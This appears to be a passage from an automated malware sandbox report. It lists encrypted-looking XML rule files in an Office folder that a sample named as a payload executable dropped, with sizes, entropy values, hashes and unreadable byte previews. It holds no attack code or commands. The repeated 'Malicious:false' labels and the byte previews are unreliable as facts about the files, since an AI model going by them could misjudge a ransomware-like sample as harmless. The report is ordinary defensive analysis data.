                                                                                                                          SHA-512:E96C2E550A3B421140666C78BAF889D501EF82252B576C2D9890B4D325C591964C02BFA55D7FB0A28494870B015D9382A4A40BE5322018967F41AA1217C759D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml:Xw..L.....9.......7G.zo.........v....S.u.M$4.&..a......b.....$..(..;...D.!oy!q.......x.....n....V&.$...\...V.3.........!.P.....D...L{...V!....!X.G.R[{?B..AO^O.~...B.[...F.I..p.@......r....x.0X-4.'...-U...&.......;. df.._*..F..n.B..UF..|.H.&.A..e.$...O...kS...i.l...j.....f...z1....A.:.;..G..0u.~1/s..).Y.#....;.v.l...;...c.4I~`<....uR..t..!3&. .X_;a...-...B..n.U......AA..a..H. .CW.b.1.}...l..~&.h...<.=4s..S./u..q....W.....f..a.......L^....=.<7..0W.U7....~...+......)q.Sq(ng...~.i+?SB{...-.ND....b1.C.....n....8.A.T......Z..........f..^2(IA.......7|..t.G..0...x.-...."\<.E....h...xQ!.K.+.XE.....{\...W.b...`.p0.Lf....v..... /.l..MLN.&D..G....F."Pk..,.....d..Q.&.p).^........J....8d......r(++...#..h..O..{....B^...x......tA.`P.y..{.;.6.;0*.....m.......l<a.|.fo.........1J.....7.*.w.H....3.}........d.o.._..R3..4y..^0[..h..Ib4..c..{b..i.H.K..HJ.7q..l.(2"...9...R.D...s.....F~..G..:..B...}.%%.6..e....B...KVW-..e.U.L...=.sH2..9.SQ.-.8S.E.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.865575483979176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:d1Vw+Aj9rdhfowGFBGXgkm/kzb9oYAPi0iDkbenD:/bA5RhaFBGQka2oYSiLV
                                                                                                                          MD5:FF80959F2C40AEB72783B0C308C638DE
                                                                                                                          SHA1:5D1D4109BABB94E768A0EC35247613FD827FBC1F
                                                                                                                          SHA-256:799A1848584B0FC2B5362E0916705506167BEA69EEE0C8344A6225A28D46AAF0
                                                                                                                          SHA-512:0C8797140BE7EF263FA47166BB4B4A5FA00CB8750FE0A5183C87DBDC951BCC22AE316BB3C1371B377AB9B61FE6345DF582DF6A7B291C6F763A7F10028F4AE9C6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.%......z..Y<.Oer..5..,9u%...W..o.A '.:.k..Bm.<..>..Iyt.Z..$.l;J....4h.O...wev.E.....)MYh.....S..N&p.X...WR.%2....e..u.../'n...C...eY..9zVK.4..Vd*........q..,..a..Fh...J...0K}'..k...1.\f.2.1...a&.Ch~.G=b.1.;.E..m.3K.!.r..{.z....u..Ql4.B..B.UW.h....N..(f..m+.......j.....B.,...m..@...:G..;....",YC9......%+.p.;^..\...gC...I3o.".Z...+......nj....9,0.k..!q.$..x.fB.rD2.W.e~,G^.../^....ce...".[...f2...P4.a.I=...a.Q..@5..F...X..uAMKB.B...,..t..m..~S...;......X...7*-;9B*N....t.....^...K.j$.H.....<..%PV.wg.J.GS)..]E&.a;.`.sqJ...)./....t.*....b.H.?R..>...q.6...i<..}.p..t.........N.R..NI.6H".h....p..&(.:.W-h.n4=..3..w....4...}.Y..f.O...9t...Ky...;..Qr..(...@..)..:..s..G..',v..\Nx....s'9.@.ba..........A.h....*M.0I...J.R..z~.x..E..{........B..'.6.....-.[..?.]......!).o....tV=.1.e..$.N...\.~T..zH.$F.n}...&...u..?..!o.._.?!....D&..k8... \....x.E!3K].$....+...vc..\....w.....)?o........a..k.. ....@....vc..JJ.R...I..).0....j.k......t..y.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700750v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1710
                                                                                                                          Entropy (8bit):7.8751334877804275
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:w92qnh22l3f0I0YdRzhxMLWFXJGiHyIh7g/ECoxGt2bm9gviEU4zf6iheZK5N5Qg:I7l3cI7HP5XLtCoxWbPCvQ0D
                                                                                                                          MD5:C1B018ADE5E00C0ADBFA2AA88BF32645
                                                                                                                          SHA1:70DC15408844B1B795D74D661E8805213AB62726
                                                                                                                          SHA-256:C1FBC7E563ACB54AF15DC498C7ED6461072D021545CADDC188D2EFD88A326DFE
                                                                                                                          SHA-512:2571B891EF4B855E2E438A0F73A7ED17794D65604A22D26CB45BB9B91673C372063FCC710F8821ABE61D59E9C08D0930D22BED26DBDC18E023A5FA6CA68B1D6F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..7I..J..V..._W."L.m..yK8z.<-]....._x^.'....r.-.i.V~.D.z.5.....k..r.3...h..b:1..pj....."2D...G. .h>.;....q...6>.D.............Y..>..........`{.F..zCp..oJ...U.C[.i..`AT.~U..Xm..*.g#...............B.r.P .W;.a.2..'.."B}U.`E.Wi.Y......d.~.....2..Q._....7.....e.....0K~f....y.96.y.......P....df.CWXFn..3.....G..~..+.xa.T5.=.....R.D.fv.{;..O.D...o`T...O....3...........SP...`..q!.&>...A8).|.E\..&.ku.pS...DC..M.........i.;.=}.7.=..:....6q.........'..B.:s.|../../.._.p......}pv....eU.rL.5..4..NM."q.F..F....WEi..B..@{..`.....1.X.....fT\"c......&....%....~.f.....T.v`..5.......F.u../...gi7.X6.uH.a..R.:g...C.M......'....'..%X^..B1..=..m.Pk..b46..}o.2..!.!.....s.Q....K.u.(...Y.>..9.N..... +..Y.f4..8..a...*.Q...v.q.w..V..77q!...';a...d..=.{.>.5....#vN`......R....~9J...(....*...>H.Y..=..._.BN.777.}9....E...$............O.........QY...(.w...m....^2..g@.mWT.XD`m1.H.M....7l ...OQ.x.....A..V..BW...X.A....E.V.._.[..2...vQ....=..V.#2..k.Ox.w .}.T..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700751v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1747
                                                                                                                          Entropy (8bit):7.879768751253319
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FkBmxb33A//93OeaTTlJT6P3ZsNZAU4gnw7kaD:RbHAdTaTTllIp0SzgnQ
                                                                                                                          MD5:EB5EBB6BBE138C8B526CA778394E4996
                                                                                                                          SHA1:536E8B5450D3A8A015A4D36DF079B756B67BCAE3
                                                                                                                          SHA-256:B51214DF1DF577088C342E6BA8C4072D9692C7E697584164B4E8EA24DD5DA7A3
                                                                                                                          SHA-512:178833BE6812DDDAA798F1BBB34E9577AB63713BB40E314A082827B1114E10CCCC55A8CB4AEDA81BB37505E8172028DD395D4DBDE698FF1F0755882B78575A79
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.MKF5.q....#C'_..&.oY...O..2y.0.1ay6..(.!.y&.Z..kC...^I.._8.^i..#P....Z.t..T...`.....4...M...h.2=`.R....M.v............e.d.X.,I.K.Q..,M..L..(D.NU.N._]..p.2..Q/1.. q......Jv....k..Ok...xb....."....j..>..O4..M.m...??l.k...vb......R.....<.H>..Y.FM.s."w( ."k...T........G(tUY.W.?`.W.ze..k..iX...L.g....L..o.zzDWC?E..v..g..y-J.?T;...:W.......}./.F.c.S...&..;.....J\.0.\.Br..h!.!...E...... .T$.#g^..yZ(A.h9..'V...uT......J.{?.A..qSY.i.7.W.....y...D"%.F.j.GD.7.....dG.^g...\...:._..9...C-.H.~o4..Fa..7i..c\R.....:.p@..3.......k<.......A3&..#.....?.......nw.:.Z.....?...S....(@.. I_..`&...i..p..xH..."`_.8..).....N.....}.Nt. .J.\qW.N.....kXM..w.y.}r....Y..*'.!.1....M..t~.C..............M.i.E.5.E...1.yB.....N ..l...4...A...T...2....."K........s...9..H..=it. I..]53....3..N.jdZ......a'>...k.l\...!^E./Y3.%Ygb..............)P[T8;........a.6+vGAh......^Q...k4(..@.?s.../....!..<...4......T5.....>I.i9..w.COdt..*......y9{.....E.Q.u.(.<....I>....V............n)s.Ka

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700850v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1711
                                                                                                                          Entropy (8bit):7.893553621240483
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Np1tC9G5kELuh42qCRgjPXHqX3AHxRQdPXqFqNLJWEN2BgcwJD3cO0RYIQsjqaEK:VtePQMqCRgjPdHePVLJV2m5EQGydJqtD
                                                                                                                          MD5:3FEDE1006201EE656DA85AE0B2DDA2B4
                                                                                                                          SHA1:4A5CF66C84D8522542E08B246B0DA893B60E88A1
                                                                                                                          SHA-256:537BA0333EDBD3183C441C2FFD26FD349331B5261D2CE96575F2889C4749469A
                                                                                                                          SHA-512:6AF5E3D39656BB62CE511008373B5B1DE34A9EB9A393E14BAD2348EFB62AF8EE5D4864B002822734D1B66708504922FB04BB07152AD749DE18D9D65D18805B7D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.A..wh.....\.6T..}.L..A.....P..vl...U....G.~..0.lR-T.R.G>......Y.f0.c..\.q$...e.S+.t......Q...%.....j`9.Z:..j...(..:~..\.t...&.@...zv..V$iy...+7..oj......Z....6..>......F.<..D./........y.-....s.....g.3....=.c..-.v./N...J.Z..~....)V....#k.].)b....%...0....\J[.%.u...!4D+.R.#+..u........}..{.._..bw...}1.m......dm.X.w...O....>@Q....)...=-.X\....M.+......Q......T..B0....a8.......)..lC.(P.....K..r@...g6R.. ..6.b....J.A..x.)..$b.)..W.1E#...a............p.........'...\....P.6.K.7....B....\.~...Ms..1."Z_..9.G.).z..]..3W..........^Ie...B........B..M.o.....s.8'....C...o...%@....q......v..........Rw.._.P.,<.4..#..i.v...Y.......k......'.W.1.((..Q`7.7....^<..c...\. ...qM..qU.........Q3f...6RY...I...5.".oBqrMe.Y..~s..1...t}V.8.C[N.Y.......C......0.h....|..1.!r.A......8..f.x.....b...uQ....x..O....I.~.o7.ra3........?..a.5....'$?W..kR........U.!.P^...N...g.G.....>IA9...~.V\k[6...{....a(3.yO.P.rT....a&..h...i...>[.O....).y.l..`....`..V.....;.....Q.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700851v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1748
                                                                                                                          Entropy (8bit):7.890914859926247
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lKwVD4ilsn859v0DE+9jLRFyf5JViLbwZD:owF4AsnUv0DEMjFFyfzQL8
                                                                                                                          MD5:54255A39D6691C37C97273DB5CA8721A
                                                                                                                          SHA1:896A32EBF7F47115B500D6A7344F1FB7674F3EB7
                                                                                                                          SHA-256:51955D0320AB4F5998106BB10956E38B55890DAF7F32863F9FEB5765A59E5D86
                                                                                                                          SHA-512:AAD44EA74E78DE5D2D1497BAB089FB255D33C44D27235236035BC114E92FD2AF464D46285761E61CE7C70AEAEA9585DA6AB5EC5216BC5DF7BC1010BC417BFD3B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..9...=f.....2%.y..I.:,wF..c.wx5.N/.Y.I.3..=B-..~[F..5FG...hP.........F.pNLzR..G..n.+...W5..pp..t`...F..$uTy..F....$......'.K._.?}....=...X..;2..5aZ.!.X..2.....x..O.w..........*./...8...Q.......QP.-....E..=.].ZTY..*..a..Y.H`-..Vr..../.q.l...:..m.J.c|.......*..Z.n.<pP?.e...o...c.!.\P1..._.$.e.<"..3.z.Y.a.%6^.' z...|...ym..v?...%..[.>D..:."].._44.7AO;.f..;.zN.z.T..d...|&....$.Ks~.....r....l7.m.(...&. q............+..l+....e{x.Q...W..)..e..m...,...).+....p.....r..\d.......R....H'.y4...,.h^*.H..`.sDS.B.@.1D.r.<0..........H.H./....ia.n....o.7%.<`...<.z.O.@|7.(.A..1....(?.&.Q.......F...^.....X[oV9..D_q..0...Z.k..A....7x.....A.gY#..^.......")........{........1Kvr.[.8;....p..;^.@!.x..C.....n...#..PKN...p.......L.....=.w...C..UU....Z.........3....C.Nr .........T..F...F.V....`Px^I..?.Hd..m.#T.Wd......D..o.;.../|..dP&I..0.O.....B.........._.......n...L...S....n>EM.l.J.,j....4f..`..H.h8...p....%....x#C..a.....;>.....p.|.A.......c#.A..C....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700900v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1704
                                                                                                                          Entropy (8bit):7.904230387433819
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Y6/lQg9aT+SBaQFuqWQPTJX0gj2A7RCpmiGJmHKScREXfURIreH8otCdXtT6QKl4:9Z6RhPN0u26UeJ32XsRIrmBtktxKlEhD
                                                                                                                          MD5:6F8D60A60FA046DF4BB9DF7ADFF8B2C0
                                                                                                                          SHA1:E027C5EC3D519F58C22AC28A260C92740798B371
                                                                                                                          SHA-256:3D45D5D4D21894C2D311C5ED9377BB899430ECF0C82402E2A85F216DD6478F79
                                                                                                                          SHA-512:C864A790D74717136677649977DC07D13C1F2B9F99E6240A926272C006828C0E305B451065EF9E0DE7B14CF8B8FD5E318BEB2F41064F2553CA89660F65B6CB4D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Y.f..Q ....(h...~Z,..Q...)=...I......1e...B..R..`(3*.1....y.R.....+..Z.....;A5.6|.~.._.s...l...0.P..lR...AJ......#.yqn...c.\..H...........CM5N...F./*H...XQ65zO$?.y&J......E.,....Hm/U&.}q$.&.....^=..V......o.z..ot.`...X.V`._.m'.[e.._~6...r..#px.~.....hJ.@....O.......^..P..T.....7..@P_i...$]...k..#$?;.X..s8..x....{c..t/.. 5.yq.(@.%.....9...@I.:..td'..;ZqT..n..'....'k$m.{Jx.bx......4......$........]..&.j.....=4...'.q..V...?D...P.9,..p1/.[.......+..o...z.Zi*..IdzCn...a.D.....I=.FU.Q.c*.iK]}_$.L..}. <.V.c...w(a...E...a...4..9L..'...H...j.....U.Ft`B.R..w.9..a.|...g..7.....:Nw.....D...d.d..gkU>.%-J.(.....k....g...{..~..9f...qG.........(.Ul.F.3.wcz.kVM...}...c..].j..."..F...t.qd.\i.<..J.........sL..ol.c.C....Ss%:\......;...Z=k.+u).94..A..1l#..0....FCJ.I~...]..d..N..!.K8?U1\..5..[..1.C......Z:L9..K.!..p.....;..G..tg2.c.&..N.y.b.S....l.8.+va+.....(nY...9.........x.Z.@.X.?.F.`] ;.I.=........E./..L>... .......n........*&.F.?..i.4.+.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700901v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1741
                                                                                                                          Entropy (8bit):7.903065293739939
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wgQDduRg5Bx9w2D4AqiLHx2gOwi8Z7CWBxHN/CgD:wW+bmC2JD89CWPHN/C8
                                                                                                                          MD5:E07B0A1B396EFE637EC2FD34FBB58C57
                                                                                                                          SHA1:07E1E93E7F9322CAEC7EC9A6CC7B5693A0B43098
                                                                                                                          SHA-256:1CE0990120E7E859D8B4F016070E8C5D60DE4AC954D473F7B9834DD7A6EDB778
                                                                                                                          SHA-512:C22946C825D0B135EC519A2F7AD79174619C2F88CE82AEE24CB3F0C63B16D8ADAA14606ABB07CFE606C18FB5B03CB820997ED146C9317B80317160135A67DFA5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...~5..i7.v..n."D..!....(.o.h.f....6..G...8..uAX.2+8_.)x.i....qt..g....6.`.Q....A.......H|R..5......Kr...hqw.)W.x_...S.z.q{....)..Q@!.p.......C.%.7]..{..?bWjC^....c.'..S......=....{.j....4....s...[C.....K.......X..5....'..U..CI...d.@......K...4..Pff.k.Y.&-.3-i.....i..6..5...Q..2D.....5.C.".........;o.....Q..-..\.%...}...Q..F;....d.J...W.X..tM...2J...,..yJ.P.V1....F......>...$...RBzk...Kk9.n..w.z.6...g.4..E'....#.<..7..........Ax..w)..5..n..*(r.s |N..{H~#+..w...$....g!...`..r...t.n...[.g$7...D}.t....p..[....0.g.U6.M.7.S{..?..g....... ..L..b.....3UY..l......Q.1.........h....>..=B:QM{.`'.S...5.xUO.d.P....e....5..k..........g.....>.e.-.......)0QH......}.....I..,...A=M....L'X..O.......h2..1p...bZ...`.`.._..D./eq..l..h.....t..w|l..........L.\...0.C[."w......VL7...S+.....IV.H{\>#..Xk..k..*....=..)...T..o...W........%.........?..K..M.........YK...w.^[..m..a6).R...4....-...[..9zk;E.g'.x..m..u.......B.u:.B.uP%.!U.lZI...:s..<

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700950v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1702
                                                                                                                          Entropy (8bit):7.885395597717155
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+Fte4lxhQOOyUipWNzgj6ngmDn1GB6wZ0uDxgZiu37JD/BJrqYujty2c+lykat+X:+y4/SJMpSq+J710q7V/BJrqZM2c+VaqD
                                                                                                                          MD5:500279467D3315648D86BBAC6BE63293
                                                                                                                          SHA1:A2988A1F4031F4A1F7FDD62267CF647411F365A0
                                                                                                                          SHA-256:D255A88A6A1ADC15C6494C3E36D46CEDAE4353095E6F6F3D094DD4FC4339166C
                                                                                                                          SHA-512:F2149E71723B06F3F1C61A061A36C4C7DDF331AA66A32BF46CBF772E801E1B8C48F80DCE74CAF0FF1BE7331771772D929591EA16D29796E533452B451CC14294
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.z...n..UEyX$f.oQ..X....OIg..P.b.....l.^k.{h2l...~.....T.+6.O}....W..#m.\!..+....c.......g....yj.#..q.u.....Drs....)%?.lRS.n2yDvv.g...Q....*...EG*.m.P..l1.-.bq........3.i.kA.j.c..m..A&.'...o.H..",..t.5....V.Da.D:p.Q..SB...e..WZ....aP.ru]@LIK..]j..!..A6..0.-.Q %......$.A.I...Z.h.Y....s....H.....HC..:.d'.b3`.l)2F.......^t.FN....<..1........pg.[....ZFy.L.W..[c..^I7.....Y.h.w..J.(....+....f......Q..>.-.X.+...o..>Zn.u.....;9...h.S2...N.*....6.....:q.\......h..A.#...%.\.=)Y.F.;..(.i.%.2*........L.x.OE*Z'OY.......'7#S......|]....1..m].jYD1G.........r.OEt1...G.-@3..q.Hh.......X.^..&q.e..7....IO.r....\.....PM..B.A..'.8]B....CR...J:..'..[...@..z{....kY..m..45..g..fi.`.+D....;.zv....c.Vj1.......j...a......b..o.J.......zVv9\.2..l.......J&....\....#i..u..ik.>.N._....G....PO...*...uE.r..!N...X.wj5.+..g.....'B.?Y..2......w..~.0Yx.@-..eG...u...&.....{.....r.V..2."(.h.=LM..C..\.L.. .3T,+g&.......}.._j......@..%e.+(.._.....(.....rS.}n!.H...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700951v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.862639273595725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lZQpzZL+1NXaHNrTLSVoKWcVOFeDAlFZ+tUq2LR0QxL9D:zIZyLkrTmVPVDIPLmoLF
                                                                                                                          MD5:16ABF6FC0D854BEFBCF08D75AB0DD85C
                                                                                                                          SHA1:558E12DA1D78A59F509C47EF7E6D21967EE2D34C
                                                                                                                          SHA-256:96E0DD7CF624978E3E60B0C7FF1B0F5D3B47172888019906DEEB8EA73C0B5562
                                                                                                                          SHA-512:432545BCC3E40E52E65862874362CEFC60625B7D612DC70804D562DFE5CAAB532C39D01FBADA72485D519EFED0D12CDD0DE0C51557C0BEF34D38C939B28F512A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...}......>...@..........8.C...yW..1N..\...<D.......N...,.KEn..:88..>..A.l..`..D..F=l/....e..k.....i;\...%....e.._E....\...!^A.>.&....Slo.../.e..nQ...[qG..b-...~+.HXu.[...`....V...R.~..A|n.2.a.f.16.&=u.9O...Ljx...?..^..4. ..1....YkLS....<,r/....^.~..8...,J.bJ.@.lA._.#...;{_...%...o.o.R.*.o_U.~.K.+D<UD...;;.>._+@.....In.R....`..e....'.D..O...M...6.2.ax.:.......f6o.....%.u..K.'..."2.......KD...Z+.(].=n_vf.Z..;..2[...M.%.X.W.....D.X.<..?.........`..*.X)b2..*..."%&..=...^.Be.6...!.$[N%..U.=...=.._.T^......N.P...<.dw.....q.#F....[.G.r&lE.Z[<wB.....A......x.......c.......|..K1.._...F0.....g.Z....L..m...MZ.)....j..E.@T.s..98[......I.|...W......9Q>.{.x..\...@.Kt.X,..M=8V5g.h..zi...7.Z.$.1...|.]........\!+...\8V.nj$ G.GC)*D.lPR........8.D.0VS.Xf.T:..8.?Y}j..*.2.p...].O....3O.. .........Q..C*.......0.j....../`.[.Q.!.#..P.N...H.....-@..a...p]".Dv9>8..X..zJo1.1..o...j......4.v..y..+.+`.'..`q.I.!..G.M..p.."(...*...c.;. .60f.#.9.(.k..D..0.72....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701050v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.891200444418944
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Y1pX90QVhSDZfXqMOFQoeatt7ktSykSGD:Y1pN0QODZfSFQ67KG
                                                                                                                          MD5:50D9857F0B3DE8B7795B6C82DA86B460
                                                                                                                          SHA1:243DA7B20BEF0EC8BDB4B4B786B892EB0586FCDC
                                                                                                                          SHA-256:896946627C13780F3D08F067F88754B42AA3BBD4DF7C38E94C2DD83D087B48A4
                                                                                                                          SHA-512:677BCC611B0127E7FBBF55C6B31AD4EE4A86B6DF6E9F3A1ADCA7A603E9E6CCE5E9552C484D2009F120C1D8CC2E0C89CF3B7F6EA1B98D1DB19BB6E9E5567E5CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.N~(A'.y.a.,..S...........B.|.p}A.r+....1.hs..{...m....=.b#V...5.rv....;.....;.........(.6.~..1H.c....5D.e.Lc..h;{...E{9..T]p.k9...J.&.P...D.snr.l.....=t....q..Y..._....(o~..... a....on..=.v.'.5-_......dy...*9.u.IC..3p....l..~)Bo..g.7-......}...=y."68..G.^....!.....j....N.[t3....dB_....`..T..<.....X..F.s.i.g....qX...S..[..CZ.)T.q..o%B.!Q8...vZ..u.$U.gT.k....<.}..o.......U....hw...#P.2...1.@..........6... .........6mYxR.&"3e....7HK....}q..?............b|y..u:.4H.8.~......xv....5.K..........woRUC.... L.^`.D.....#.O...Z6.........c......s..G.A-po...+W{.a.. .*i...\......!.../....}...k.>.Bn....J..4..[.AT.0..!W0..W.H...E...3.....uE.._..92Tcm...yT..[..kGj...F.e.ty\.d.(r..[...{5..!........U^GK.F....iGY....l......3'HL...=z.5.2....M.F.......Xa.rQ...(1.|...5.U..;e..fO.K2......&...........o..kCdQO.l.~....?..{..w7.w..^..W.F.qg.....M.K...;.....;..<YI._y....){J.%.....E...y.y.1.b.5.. r+%.$..X.3....z ............7....-.N7. .?..>.^C.YCL..j.....F.`a,

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701051v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.879298566095067
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:uSb979VVSI0wxd55EaQ/7ekIVHYNmIBFAu4xGD:f350Ad5U/0gDAu4xe
                                                                                                                          MD5:9962311ACFC30757EF70990186745341
                                                                                                                          SHA1:044B8E39793C548E32D51FC159719906D66B8DB9
                                                                                                                          SHA-256:76713810B37120E919FB327C02D95CD20C1AD6C2A3C31914C55826A720DF6765
                                                                                                                          SHA-512:DB0C4DEF3C243C81FEC625B355D425192CC6C0178E142AFE28351B9A78117694308C526176E155F0A79379C4F174D84F75CBC1152B44C958C199B42909BF9C8E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......[..lW.(!....3.n......':.t.$. .~.'...8u.6./-C..M.s....(.b.....d..\..BK...64....a....g....p..x.5......QB....L.....\dT...3F....~..W..&.o..Re..-..1ujPdFQ%LY...n..J*3....D..!.X..z._....<{...N.f..}Jp.N._p...R=6.u*@.'P.....f..@....M.0./.0.gbz.-....].F9..L.B./...5..im....L.....Y...x....J....,.?H....wHch....F.C&.+..<.s.....V>.O.G.5F...F..D.M....[[.....TK.N...."t..L..02d.h.\.s..YU...N2.N.c.[....O7.(f..Z...+....g#...)jD[...rT_...f. 5 ..OK..R.w.....A.{.Q.=.7..hZ/y...[....".Er1..=....I...8a.Z..sY.J....;.J....4..WJ.!.."......i)w.O;..kl...7...H.*(........,.Cb9..r..z.ngG,.3u...j...o..Y.+.S..U......(ILE...P)..s....0..!.^#...D.kc...4...`..e2M.-g..^......8..!I.'FIrny..._E&k..j...b....l..$2zU!..6.n...M.pM..).V<W...X...o...W...n.M.e..qmh.....l....V..b(...r..f.(.d..s%.sz,....N.!M79..tO...Pu.L..."..?,.x:....=.!.....i.H,..._.x}.k$.i6.(.EO..i....&...5_".Ng.7y..|.,k...\Y..c`..)8..P...N.......c...[.&.?I......i.^)X>..2..\r..Q..>...I..)t.*#N.W.....F

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701100v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1707
                                                                                                                          Entropy (8bit):7.9018158332851565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Kq6ZIauNdoSj67WkgD5H7oxz8KizwCJjB/UD:3suNdoSj6yBH7yzzKjB/A
                                                                                                                          MD5:10471531A7642C62DA2B5EDDDFAC0D2E
                                                                                                                          SHA1:C82A5AA653F4B1C6C3BB78AEDE29A46360002686
                                                                                                                          SHA-256:FEE21B55D38292A9D898EB7D2FB55ED9CA4D974BAE7B4171C2CF92C8AD31A8D7
                                                                                                                          SHA-512:9DBB9E2C404641C840924A675691D518E4D2788198A419BBCCB97663A32B18C671E684BE566D20426B0727E49A2D0A2652CE8FFD39E2879AF795FCAC00D20051
                                                                                                                          Malicious:false
